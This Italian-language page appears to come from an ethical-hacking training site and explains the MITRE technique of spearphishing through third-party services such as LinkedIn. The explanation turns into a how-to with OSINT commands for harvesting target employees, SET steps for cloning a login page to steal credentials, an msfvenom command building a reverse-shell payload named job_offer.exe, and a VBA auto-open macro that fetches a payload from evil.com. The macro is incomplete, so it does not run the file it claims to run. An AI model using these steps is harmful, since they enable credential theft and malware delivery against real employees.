Spearphishing via Servizi Esterni: Phishing via Service (T1566.003)

Il spearphishing attraverso servizi di terze parti rappresenta una variante sofisticata degli attacchi di social engineering mirati. Questa tecnica sfrutta piattaforme come LinkedIn, WhatsApp, Gmail e altri servizi non aziendali per aggirare i controlli di sicurezza delle email corporate.

Gli attaccanti creano profili falsi sui social media e contattano dipendenti con offerte di lavoro o opportunità professionali apparentemente legittime. Questo approccio si inserisce nella fase di Initial Access (TA0001) della kill chain, permettendo agli avversari di stabilire un primo punto d'accesso nella rete target.

La tecnica ha dimostrato la sua efficacia con 14 gruppi APT attivi, tra cui attori di spicco come APT29 e Lazarus Group. L'impatto è significativo poiché questi servizi esterni spesso hanno policy di sicurezza meno restrittive rispetto ai canali aziendali, rendendo più probabile il successo dell'attacco.

Per comprendere questa tecnica, iniziamo creando un profilo LinkedIn credibile. Utilizzerai strumenti OSINT per raccogliere informazioni sui dipendenti target e costruire una narrativa convincente.

Il primo passo consiste nell'identificare i bersagli attraverso ricerche mirate:

theHarvester -d targetcompany.com -b linkedin
linkedin2username.py -u targetcompany

Una volta identificati i profili, puoi utilizzare Social Engineering Toolkit (SET) per creare landing page convincenti. Configura SET per clonare una pagina di login legittima:

setoolkit
1) Social-Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner

Per simulare l'invio di file malevoli attraverso servizi di messaggistica, puoi utilizzare Empire o Cobalt Strike. Genera un payload che simuli un documento di offerta di lavoro:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -o job_offer.exe

Incorpora il payload in un documento Office utilizzando macro VBA. Il codice seguente dimostra come automatizzare il download e l'esecuzione:

Sub Document_Open()
    Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
    Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
    xHttp.Open "GET", "https://evil.com/payload.exe", False
    xHttp.Send
End Sub

Per testare la persistenza post-compromissione, simula le tecniche usate da ToddyCat che distribuiva il malware Ninja via Telegram. Configura un bot Telegram per la distribuzione automatica di payload compressi.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo

We use cookies

Utilizziamo i cookie sul nostro sito Web. Alcuni di essi sono essenziali per il funzionamento del sito, mentre altri ci aiutano a migliorare questo sito e l'esperienza dell'utente (cookie di tracciamento). Puoi decidere tu stesso se consentire o meno i cookie. Ti preghiamo di notare che se li rifiuti, potresti non essere in grado di utilizzare tutte le funzionalità del sito.